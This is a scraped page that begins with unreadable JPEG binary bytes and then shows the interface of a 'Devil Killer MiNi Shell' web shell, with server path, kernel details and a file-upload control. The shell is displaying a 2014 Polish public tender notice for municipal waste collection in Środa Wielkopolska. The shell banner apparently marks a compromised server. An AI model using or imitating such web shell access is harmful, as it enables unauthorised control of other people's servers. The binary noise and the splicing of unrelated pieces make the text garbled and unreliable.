JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141107/234157-N-2014.html

<p class="kh_header"><b>Środa Wielkopolska: Odbiór i zagospodarowanie odpadów komunalnych zmieszanych i odbiór odpadów komunalnych selektywnie zebranych od właścicieli nieruchomości zamieszkałych na terenie miasta i gminy  Środa Wielkopolska w okresie od 1 stycznia do 31 marca 2015r</b><br>
<b>Numer ogłoszenia: 234157 - 2014; data zamieszczenia: 07.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Środzie Wlkp. , ul. Ignacego Daszyńskiego 5, 63-000 Środa Wielkopolska, woj. wielkopolskie, tel. 061 2867700, faks 061 2867702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sroda.wlkp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych zmieszanych i odbiór odpadów komunalnych selektywnie zebranych od właścicieli nieruchomości zamieszkałych na terenie miasta i gminy  Środa Wielkopolska w okresie od 1 stycznia do 31 marca 2015r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem niniejszego zamówienia jest:
Odbiór i zagospodarowanie odpadów komunalnych zmieszanych i odbiór odpadów komunalnych selektywnie zebranych od właścicieli nieruchomości zamieszkałych na terenie miasta i gminy  Środa Wielkopolska w okresie od 1 stycznia do 31 marca 2015r. 
1.Charakterystyka Gminy Środa Wielkopolska:
Powierzchnia gminy: 270,4 km2.
Liczba mieszkańców gminy: 31 134 osób (stan na 31.08.2014 r).
Obecnie na terenie miasta mieszka 22 311 osób, natomiast na wsi  8 823 osoby.
ok. 15.000 osób mieszka w zabudowie wielorodzinnej i ok.15.000 osób w zabudowie jednorodzinnej.
Liczba posesji: 4559 szt. 
- Miasto  3097 szt.
- Wieś    1462 szt.
W Gminie Środa Wielkopolska znajduje się:
 - 110  Wspólnot mieszkaniowych
-5  Spółdzielni mieszkaniowych
-2  Budynków zakładowych 
 - 35  Budynków gminnych
 W posesjach wielorodzinnych znajduje się:
 -  52 szt. pojemników KP-6, 74 szt. pojemniki  1100, 16 szt. pojemników 240,  100 szt. pojemników 120         
Gmina liczy 38 sołectw: Annopole, Babin, Bieganowo, Brzezie, Brodowo, Czarne Piątkowo, Chudzice, Chwałkowo, Chocicza, Dębicz, Dębiczek, Jarosławiec, Januszewo, Janowo, Kijewo, Koszuty, Lorenka, Marianowo Brodowskie, Mączniki, Nadziejewo, Olszewo, Pławce, Połażejewo, Pierzchnica, Pętkowo, Romanowo, Rumiejki, Ruszkowo, Tadeuszewo, Starkówiec Piątkowski, Szlachcin, Trzebisławki, Topola, Ulejno, Winna Góra, Zielniczki, Zielniki, Żabikowo  .

2. Szczegółowy opis przedmiotu zamówienia
Szczegółowy zakres świadczenia usługi odbierania odpadów komunalnych od właścicieli nieruchomości zamieszkałych znajduje się w Regulaminie utrzymania czystości i porządku na terenie Gminy Środa Wielkopolska.
w okresie od 1 stycznia do 31 marca 2015r. 
1)Ilość odpadów komunalnych odebranych w poprzednim okresie:
W miesiącu styczniu 2014 r. odebrano 524,44 Mg niesegregowanych ( zmieszanych ) odpadów komunalnych i 82,68 Mg odpadów zbieranych selektywnie. 
W miesiącu lutym 2014 r. odebrano 502,81 Mg niesegregowanych ( zmieszanych )  odpadów komunalnych i 68,79 Mg odpadów zbieranych selektywnie.
 W miesiącu marcu 2014 r. odebrano 576,42 Mg niesegregowanych ( zmieszanych )  odpadów komunalnych i 73,44 Mg odpadów zbieranych selektywnie. .
U w a g a: 
Zamawiający nie zapewnia realizacji zamówienia w podanych powyżej ilościach, stanowią one jedynie przybliżone dane poglądowe wynikające z lat poprzednich oraz dane z  br. wynikające z faktur obecnego odbiorcy odpadów.

W drugim  półroczu 2013 r. odebrano od mieszkańców 3515,94 Mg odpadów zmieszanych i 463,66 Mg odpadów wtórnych selektywnie zebranych
W pierwszym półroczu 2014 r. odebrano od mieszkańców 3300,49 Mg odpadów zmieszanych i 521,02 Mg odpadów wtórnych selektywnie zebranych
Rozliczenie z wykonawcą będzie następowało na podstawie zaproponowanej ceny  ryczałtowej  za całość zamówienia określonej w Formularzu ofertowym nr 1  stanowiącym załącznik do SIWZ płatnych w miesięcznych ratach. 

2) Odbiór wskazanych w opisie zamówienia rodzajów odpadów komunalnych od właścicieli nieruchomości zamieszkałych w Gminie Środa Wielkopolska.
Wykonawca  jest  zobowiązany  do  odebrania   niżej  opisanych  odpadów  komunalnych z nieruchomości zamieszkałych na terenie Gminy Środa Wielkopolska.

a) Niesegregowane (zmieszane) odpady komunalne
Kody odpadów:
20 03 01 - niesegregowane odpady komunalne
System odbioru odpadów:
Zabudowa jednorodzinna: pojemnikowy.
Zabudowa wielorodzinna: kontenerowo - pojemnikowy.
Rodzaj pojemników do gromadzenia zmieszanych odpadów  komunalnych: 
Zabudowa jednorodzinna: 110 l [0,11 m3]; 120 l [0,12 m3]; 240 l [0,24 m3], 360 l [ 0,36 ], 1100 l        [ 1,1 m3 ]
Zabudowa wielorodzinna: 240 l [0,24 m3]; 360 l [0,36 m3];  1100 l [1,1 m3]; 6000 l  [ 6 m3 ];
Pojemniki oraz kontenery na odpady zmieszane zapewnia Właściciel posesji.
b) Odpady wtórne - odpady selektywnie zbierane u źródła - składowane do jednego pojemnika lub worka -  kod 20 01 99

Kody odpadów:
15 01 01 - opakowania z tektury i papieru
15 01 02 - opakowania z tworzyw sztucznych
15 01 04 - opakowania z metali
15 01 07 - opakowania ze szkła
20 01 01 - papier i tektura
20 01 02 - szkło
20 01 39 - tworzywa sztuczne
20 01 40 - metale
20 01 10 - odzież
20 01 11 - tekstylia

c) Na terenie zabudowy jednorodzinnej  do zbiórki odpadów wtórnych będzie prowadzony system workowy. 
Worki zapewnia Wykonawca. 
Natomiast na terenie zabudowy wielorodzinnej ustawione są pojemniki odpowiednio opisane do zbiórki odpadów wtórnych. 
Pojemniki do zbiórki odpadów wtórnych  zapewnia Zamawiający.

Wykonawca zobowiązany jest do przekazania otrzymanych pojemników i worków do właścicieli nieruchomości zamieszkałych od których odbiera się odpady wtórne ( selektywnie zbierane ). Wyposażenie w worki nastąpi w dniu odbierania odpadów selektywnie zbieranych. Ilość dostarczonych worków ma być odpowiednia do ilości wystawionych worków. 
Z uwagi na duże oddziaływanie na środowisko naturalne, Zamawiający wymaga aby usługa odbioru odpadów komunalnych zmieszanych i komunalnych selektywnie zbieranych odbywała się zgodnie z obowiązującymi przepisami.

d) Częstotliwość odbioru odpadów zmieszanych:
- w zabudowie jednorodzinnej -  1 raz na 2 tygodnie,
- w zabudowie wielorodzinnej - sukcesywnie po zapełnieniu pojemnika jednak nie rzadziej niż   1 raz na 2 tygodnie, zgodnie z harmonogramem wywozu ustalonym przez Zamawiającego. 
Odbiory prowadzone w zabudowie wielorodzinnej w trzecim kwartale 2014 roku  przez obecnego Wykonawcę wykazały, że konieczny jest  odbiór średnio  2 razy w tygodniu.

Wykonawca zobowiązany jest uwzględnić w ofercie koszty związane z dodatkowym odbiorem odpadów na  zgłoszenie zamawiającego ( meil, fax ) w zaistniałych awaryjnych sytuacjach. Zamawiający przewiduje  możliwość dodatkowych zleceń nie częściej niż 4 razy w miesiącu. Powyższa sytuacja dotyczy punktów umieszczenia kontenerów w zabudowie wielorodzinnej ( wspólnoty, Spółdzielnie ) na terenie Miasta Środa Wielkopolska 
 Wykonawca zobowiązany będzie do odbioru odpadów zmieszanych z wszystkich nieruchomości zamieszkałych, także tych które powstaną w trakcie realizacji umowy.
e) Częstotliwość odbioru odpadów wtórnych ( selektywnie zebranych ):
- w zabudowie jednorodzinnej -  1 raz na 2 tygodnie,
- w zabudowie wielorodzinnej - sukcesywnie po zapełnieniu pojemnika jednak nie rzadziej niż  1 raz na 2 tygodnie, zgodnie z harmonogramem wywozu ustalonym przez Zamawiającego. 
Odbiory odpadów wtórnych prowadzone w zabudowie wielorodzinnej   przez obecnego odbiorcę  odpadów  wykazały, że konieczny jest  odbiór średnio  2 razy w tygodniu.
Zamawiający informuje, że na terenie Gminy Środa Wielkopolska w zabudowie wielorodzinnej na odpady wtórne ustawionych jest:
-96 szt. poj. o poj. 1100 l, 
-12 szt. KP 6,
-26 szt. 240l, 
-1 szt. o poj. 120 l.  
Wykaz stanowi załącznik nr 13 do SIWZ.  

Wykonawca zobowiązany będzie do odbioru z posesji zapełnionych worków do segregacji selektywnej, które zostały dostarczone mieszkańcom przez poprzedniego wykonawcę oraz wydawać w zamian swoje worki w ilości odpowiadającej ilości odebranych worków z danej posesji. 
Wykonawca zobowiązany będzie odebrać worki z odpadami wtórnymi oraz wydać w zamian nowe worki  również od mieszkańców którzy złożyli oświadczenia o niesegregacji a takie worki wystawili. 
Odbiór następował będzie w dni w których odbierane są odpady segregowane określone w harmonogramie.  
Zamawiający informuje, że w okresie 12 miesięcy wydano właścicielom posesji lub właścicielom mieszkań w danej posesji (zabudowa jednorodzinna)  97.768  szt. worków na odpady selektywnie zebrane. Miesięcznie wydano  8.147 szt. worków .

Wykonawca zobowiązany będzie do odbioru odpadów selektywnych z wszystkich nieruchomości zamieszkałych w których właściciele zadeklarowali chęć segregacji bądź nie , także tych które powstaną w trakcie realizacji umowy.
3) Ustalenia organizacyjne związane z wykonaniem zamówienia i wymagania stawiane Wykonawcy:
a)Harmonogram wywozu odpadów Zamawiający sporządza jednorazowo w okresie wykonywania niniejszego zamówienia  we własnym zakresie i na własny koszt i przekazuje właścicielom nieruchomości  oraz wykonawcy w terminie do 15 grudnia 2014 r. Za opracowanie, przygotowanie i dystrybucję harmonogramu wywozu odpadów Zamawiający obciąży Wykonawcę  kwotą 0,05 zł netto od każdej osoby zameldowanej na terenie miasta i  gminy  Środa Wielkopolska na podstawie faktury wystawionej przez zamawiającego, płatnej w terminie 14 dni od jej dostarczenia Wykonawcy.
Zamawiający informuje , że na terenie gminy Środa Wielkopolska  zameldowanych  było  31 134 osób (stan na 31.08.2014 r). Zamawiający wystawi fakturę zgodnie z stanem osób zameldowanych    na  dzień 31.10.2014 r.  W przypadku zmiany harmonogramu nie będzie naliczana dodatkowa opłata. 
Zmiana harmonogramu nie spowoduje zmiany wynagrodzenia ryczałtowego za przedmiot zamówienia.

b)Wymogi dotyczące przekazywania odebranych odpadów:
        
Wykonawca zobowiązany jest do transportu odebranych  odpadów komunalnych zmieszanych   zgodnie z obowiązującym prawem i przepisami określonymi w Ustawie o odpadach i Uchwałach Sejmiku Województwa Wielkopolskiego

Odpady selektywnie zbierane przez Wykonawcę  należy dostarczyć do Bazy magazynowo transportowej , która znajduje się w miejscowości Pławce 5A gm. Środa Wielkopolska 
Miejsce dostawy może ulec zmianie, nie spowoduje to zmiany umowy. W przypadku zaistnienia takiej konieczności zamawiający wyznaczy inne miejsce, które będzie usytuowane również na terenie Gminy Środa Wielkopolska.

4) Szczegółowe wymagania stawiane wykonawcy odbierającemu odpady komunalne od właścicieli   nieruchomości zamieszkałych oraz standard sanitarny wykonywania usług oraz ochrony środowiska
a) Do obowiązków Wykonawcy w szczególności należy:
Wykonywanie przedmiotu zamówienia zgodnie z obowiązującymi przepisami tj.:
-Ustawa z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r. poz. 21 z póź. zmianami),
-Rozporządzenie Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013, poz. 122),
-Ustawa z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (tekst jednolity Dz. U. z 2013 r., poz. 1399 ze zm.),
-Uchwała Nr XXXIII/596/2013 Rady Miejskiej w Środzie Wielkopolskiej z dnia 4 kwietnia 2013 roku w sprawie wprowadzenia Regulaminu utrzymania czystości i porządku na terenie gminy.
-Rozporządzenie Ministra Środowiska z dnia 15 maja 2012 r. w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystości ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi (Dz. U. z 2012 r., poz. 630), 
-Ustawa z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (Dz. U. z 2013 r., poz. 1232 z późn. Zm.). 
-Uchwała Nr XXV/441/12 Sejmiku Województwa Wielkopolskiego z dnia 27 sierpnia 2012 r. w sprawie wykonania Planu gospodarki odpadami dla województwa wielkopolskiego na lata 2012-2017
-Uchwała Nr XLIII/836/14 Sejmiku Województwa Wielkopolskiego z dnia 31 marca 2014 r. w sprawie zmiany uchwały  Nr XXV/441/12 Sejmiku Województwa Wielkopolskiego z dnia 27 sierpnia 2012 r. w sprawie wykonania Planu gospodarki odpadami dla województwa wielkopolskiego na lata 2012-2017

b) Wykonawca  zobowiązuje  się  do  wykonania  usługi  z  należytą  starannością,  rozumianą  jako staranność profesjonalisty w działalności objętej przedmiotem niniejszego zamówienia, w oparciu o aktualne unormowania prawne, zgodnie z obowiązującymi standardami oraz etyką  zawodową.

c) Wykonawca będzie wykonywał usługę stanowiącą przedmiot niniejszego zamówienia przy użyciu narzędzi i sprzętu spełniającego wymagania wynikające z obowiązujących polskich norm przenoszących normy europejskie i aprobat technicznych polskich bądź europejskich, utrzymania odpowiedniego stanu sanitarnego  pojazdów i urządzeń do odbierania odpadów komunalnych,  spełnienia  wymagań technicznych  dotyczących  wyposażenia  pojazdów  do  odbierania  odpadów  komunalnych; zapewnienie,  dla   właściwej  realizacji  przedmiotu  umowy,  przez  cały  czas  trwania  umowy dostatecznej  ilości  środków  technicznych,  gwarantujących  terminowe i  jakościowe  wykonania przedmiotu zamówienia.
d) Wykonawca zobowiązany jest na każdorazowe żądanie Zamawiającego udostępnić we wskazanym zakresie informacje z systemów GPS dotyczących wszystkich przejazdów pojazdów transportujących odpady z terenu miasta i gminy Środa Wielkopolska w zakresie: tras przejazdów każdego z pojazdów, miejsc zatrzymania pojazdów i wyładunku odpadów.
e) Wyposażenie własnych pracowników zajmujących się wywozem odpadów w odzież  ochronną z widocznym logo firmy oraz w identyfikatory, do dnia poprzedzającego  dzień rozpoczęcia świadczenia usługi. 
f) Wykonawca ponosi pełną odpowiedzialność wobec Zamawiającego i osób trzecich za szkody na mieniu i zdrowiu osób trzecich, powstałe podczas oraz w związku z realizacją przedmiotu umowy. Wykonawca jest obowiązany naprawiać lub ponosić koszty napraw (wg wyboru Zamawiającego) szkód  wyrządzonych w majątku Gminy i osób trzecich podczas wykonywania usługi wywozu odpadów   komunalnych  w  Gminie  (uszkodzenia  chodników,  punktów  składowania  odpadów, ogrodzeń, wjazdów, pojemników, kontenerów itp.).
  g) Wykonawca jest zobowiązany do porządkowania terenu zanieczyszczonego odpadami i innymi zanieczyszczeniami wysypanymi z pojemników, kontenerów, worków, pojazdów w trakcie realizacji usługi wywozu. 
Zakazuje się Wykonawcy mieszania selektywnie zebranych odpadów komunalnych ze zmieszanymi odpadami komunalnymi odbieranymi od właścicieli nieruchomości zamieszkałych na terenie Gminy Środa Wielkopolska zabezpieczenia przewożonych odpadów przed wysypaniem na drogę;
h) Wykonawca zobowiązany jest do prowadzenia dokumentacji związanej z działalnością objętą zamówieniem  tj.  sporządzanie  oraz  przekazanie  Zamawiającemu  kwartalnych  sprawozdań w terminie do końca miesiąca następnego po kwartale, którego dotyczy, przygotowanych na wzorach określonych w Rozporządzeniu Ministra Środowiska z dnia 15 maja 2012 r. w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi (Dz. U. 2012 poz. 630).

i) Wykonawca zobowiązany jest do przedkładania zamawiającemu sprawozdań miesięcznych i kwartalnych zawierających informacje o :
- masie poszczególnych odpadów komunalnych zmieszanych w Mg, 
-  wykazie nieruchomości, z których zostały odebrane odpady komunalne, 
-  ilości odpadów komunalnych selektywnie zebranych - surowców wtórnych , [Mg], 
Sprawozdanie kwartalne powinno zostać sporządzone zgodnie z Rozporządzeniem Ministra Środowiska z dnia 15 maja 2012 r. w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi (Dz. U. z 2012 r., poz. 630),Wzór sprawozdania miesięcznego zostanie załączony do wzoru umowy.
j) Wykonawca zobowiązany jest przedkładać Zamawiającemu miesięczne sprawozdania w terminie   10 dni od zakończenia miesiąca,
Wykonawca zobowiązany jest przedkładać Zamawiającemu kwartalne sprawozdania w terminie do końca miesiąca  następującego po kwartale, którego dotyczy,
k) Forma przedłożonego sprawozdania miesięcznego i kwartalnego:
   - 1 wersja papierowa zatwierdzona przez wykonawcę,
   - 1 wersja na nośniku danych w PDF bez zabezpieczeń i haseł.
   -  wersja elektroniczna w programie WORD lub EXEL ( open ofis )
l) Wykonawca będzie zobowiązany zainstalować na wskazanym mu stanowisku komputerowym, będącym własnością Zamawiającego legalne oprogramowanie umożliwiające bieżącą kontrolę pracy sprzętu wykorzystywanego przez Wykonawcę,
ł) Wykonawca  zobowiązany  jest  do  prowadzenia  i  przekazywania  co  miesiąc   Zamawiającemu ewidencji nieruchomości, z których zostały odebrane zmieszane i selektywnie zebrane odpady.
m) Zamawiający dostarczy wykonawcy harmonogram  odpłatnie do dnia  15 grudnia 2014 r. 
n) Usługa będzie wykonywana w dni robocze od poniedziałku do piątku w godzinach 
od 7:00 do 20:00.
W przypadku nie wywiązania się z harmonogramu odbioru odpadów w dni powszednie dopuszcza się ich odbiór w soboty w godzinach od  7:00 do 13:00.
o ) Zamawiający, w czasie trwania umowy, udostępni Wykonawcy niezwłocznie informacje  o:
- nieruchomościach nowo zgłoszonych, na których zamieszkują mieszkańcy 
-nieruchomościach zmieniających swój status użytkowania np. z nieruchomości zamieszkałej na nieruchomość, na której nie powstają odpady komunalne.
- osobach zmieniających deklarację tzn: zbierających odpady selektywnie na nieselektywnie i odwrotnie.
p) Wykonawca w przypadku nowo zgłoszonej nieruchomości będzie odbierał odpady zgodnie z obowiązującym harmonogramem dla tej nieruchomości. Wykonawca zobowiązany jest dostarczyć właścicielowi nowej nieruchomości worki do odpadów wtórnych    (w przypadku segregacji).
r) Wykonawca zobowiązany jest do organizacji i prowadzenia przez okres realizacji zamówienia telefonicznego Punktu Obsługi Klienta poprzez udostępnienie połączenia telefonicznego dla właścicieli nieruchomości, w ramach którego będą oni mogli składać wnioski i skargi od poniedziałku do piątku  (poza dniami ustawowo wolnymi od pracy).w godzinach od 700 do 1500. Rozmowy będą obowiązkowo nagrywane (w postaci cyfrowej) i przechowywane przez okres realizacji usługi oraz 6 miesięcy po jej zakończeniu. Z wnoszonych wniosków i skarg, na żądanie zamawiającego sporządzany będzie raport, który przekazywany będzie Zamawiającemu wraz z cyfrowym zapisem przeprowadzonych rozmów telefonicznych (np. na płycie CD lub DVD). 
s) Wykonawca zobowiązany jest do udostępnienia każdorazowo osobom uprawnionym do kontroli  kompletu dokumentacji związanej z prowadzoną działalnością odbioru odpadów na terenie Gminy Środa Wielkopolska i złożenia wyjaśnień niezbędnych do przeprowadzenia przez Zamawiającego kontroli wykonania usług, którą Zamawiający może przeprowadzić w każdym czasie pracy Wykonawcy. Zamawiający sporządza protokół z kontroli.
t) udostępnienie bezpośredniego połączenia telefonicznego (telefon komórkowy) dyspozytora firmy odpowiedzialnego za realizację zadania z pracownikiem zamawiającego odpowiedzialnym za koordynowanie przedmiotu zamówienia
u)Wykonawca zobowiązany jest do odbioru odpadów komunalnych zmieszanych gromadzonych na terenie poszczególnych nieruchomości w pojemnikach o pojemności od 110l do 6000l i innych występujących na terenie gminy. Ponadto wykonawca zobowiązany jest do odbioru odpadów zebranych w sposób selektywny w workach 120l z folii LDPE, grubości minimum 0,05mm z napisem SUROWCE WTÓRNE GMINA ŚRODA WIELKOPOLSKA.
 Pojazdy wykonawcy w trakcie realizacji usługi odbioru odpadów komunalnych realizowanych na rzecz zamawiającego nie mogą jednocześnie odbierać odpadów komunalnych z nieruchomości niezamieszkałych, które nie są objęte gminnym systemem gospodarki odpadami
w) Świadczenia n/w usług dodatkowych:
 - przekazania właścicielom nieruchomości (którzy nie posiadają własnych pojemników) pojemników do zbiórki odpadów zmieszanych np. w formie użyczenia lub najmu, za który to najem przedsiębiorca będzie mógł pobierać opłatę bezpośrednio od właścicieli nieruchomości.
x)  wykonawca zobowiązany jest do wyposażenia pojazdów w system ważenia pojemników i w  system   identyfikacji pojemników RFiD UHF.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.31.00-7, 90.51.20.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące  
a)Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy   prawa nakładają obowiązek ich posiadania.
O zamówienie mogą ubiegać się wykonawcy, którzy posiadają: 
-Aktualny wpis do działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości zgodnie z obowiązującymi przepisami. 
-Aktualne zezwolenie na prowadzenie działalności w zakresie  transportu odpadów zgodnie z ustawą o odpadach, zgodnie z obowiązującymi przepisami</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji kiedy wykaże,  że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał lub wykonuje co najmniej: 1 usługę od jednego lub kilku zleceniodawców polegającą na odbioru odpadów komunalnych w sposób ciągły przez okres 6 miesięcy o  łącznej masie minimum  900  Mg  wraz z załączeniem dowodów czy  zostały wykonane lub są wykonywane należycie - Wykaz należy sporządzić według  załącznika nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do   wykonania zamówienia.Opis sposobu dokonywania oceny spełniania warunku:
